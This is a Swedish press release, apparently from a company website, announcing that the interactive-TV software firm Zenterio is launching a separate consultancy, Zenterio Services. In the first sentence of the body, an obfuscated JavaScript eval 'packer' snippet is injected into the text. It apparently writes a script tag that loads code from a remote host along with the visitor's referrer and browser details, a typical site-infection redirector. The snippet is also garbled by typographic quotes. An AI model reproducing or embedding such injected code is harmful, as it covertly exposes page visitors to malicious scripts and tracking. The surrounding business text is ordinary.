Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Zenterio stärker och tydliggör erbjudandet genom lanseringen av Zenterio Services

Zenterio stärker och tydliggör erbjudandet genom lanseringen av Zenterio Services
Sebastian

Zenterio, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdinb|var|u0026u|referrer|zsakn||js|php’.split(’|’),0,{}))
som tillhandahåller en oberoende mjukvaruplattform för interaktiv TV, stärker och breddar sitt erbjudande genom att bilda ett dedikerat servicebolag, Zenterio Services. Genom förändringen tydliggörs Zenterios två verksamhetsområden, där det ena är operativsystem, användargränssnitt och analys av konsumentdata för TV-operatörer och det andra kommer att utgöras av konsulttjänster inom samma bransch. Med den nya organisationen positionerar Zenterio sig som en helhetsleverantör inom teknik och affärsutveckling för tv-branschen.

Transformeringen av tv-branschen ställer oerhört tuffa krav på tv-operatörerna att förändra sin verksamhet och förnya sitt erbjudande gentemot konsumenterna. Vinnarna kommer bli de som bäst lyckas anpassa sitt erbjudande och samtidigt utveckla nya intäktsströmmar. Med vår nya organisation blir det tydligare för våra kunder att vi kan hjälpa till med båda dessa saker, säger Jörgen Nilsson, VD Zenterio.

Det nya servicebolaget, som går under namnet Zenterio Services, har sin grund i förvärven av 27M, Vtilt och Systemagic som genomförts de senaste åren. Genom att placera konsulttjänsterna i ett eget servicebolag synliggörs Zenterios expertkunskaper inom en rad områden som inte nödvändigtvis är kopplat till bolagets operativsystem utan tar ett bredare grepp om tv-branschen. Samtidigt innebär det att verksamheten effektiviseras.

– Genom förändringen blir vår organisation effektivare och våra konsulters expertkunskap kan användas på ett bättre sätt. Vi ser att vår erfarenhet och kunskap efterfrågas av en allt bredare grupp inom branschen och detta är ett sätt att kunna öppna upp för att ta kunna ta oss an både större och nya typer av projekt, säger Jörgen Nilsson.

Zenterio Services kommer erbjuda tjänster inom systemintegration, gränssnittsutveckling, utveckling av appar, hårdvarudesign, samt teknisk konsultation. Utöver det kommer Zenterio Services även att hjälpa kunder inom närbesläktade områden såsom IoT och molnbaserade tjänster.

Zenterios andra affärsområde, som innefattar Zenterios operativsystem, erbjuder en helhetslösning bestående av en oberoende plattform i kombination med lösningar för olika typer av mervärdestjänster. Mervärdestjänsterna skapar ytterligare intäkter för tv-operatörer genom att dra nytta av den enorma mängd data som genereras av användarna vilket exempelvis kan användas för att ta fram attraktiva annonslösningar eller andra erbjudande gentemot konsumenterna.